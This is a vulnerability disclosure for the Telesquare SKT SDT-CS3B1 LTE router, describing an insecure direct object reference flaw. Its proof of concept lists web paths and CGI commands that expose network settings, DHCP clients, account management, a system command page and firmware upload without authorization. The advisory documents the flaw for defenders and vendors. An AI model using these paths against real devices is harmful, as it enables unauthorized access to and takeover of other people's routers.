Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak

### Summary We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product. ### Description Insecure direct object references occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system. ### Vendor Telesquare Co., Ltd. - http://www.telesquare.co.kr ### Affected Version * FwVer: SDT-CS3B1, sw version 1.2.0 * LteVer: ML300S5XEA41_090 1 0.1.0 * Modem model: PM-L300S ### Tested On * lighttpd/1.4.20 ### PoC ``` /home.html << Version and status info leak (firmware, device, type, modem, lte) /index.html << Version and status info leak (firmware, device, type, modem, lte) /nas/smbsrv.shtml << Samba server settings (workgroup, netbios name) /nas/ftpsrv.shtml << FTP settings /wifi2g/basic.shtml << Wireless settings /admin/status.shtml << Access point status info leak /internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns) /internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns) /admin/statistic.shtml << System statistics info leak /admin/management.shtml << System management (account settings, ntp settings, ddns settings) /serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port) /admin/system_command.shtml << System command interface /internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr) /admin/upload_firmware.shtml << Router firmware and lte firmware upgrade /firewall/vpn_futuresystem.shtml << VPN settings (udp packet transfer, icmp check) /cgi-bin/lte.cgi?Command=getUiccState << GetUiccState() /cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak /cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak ```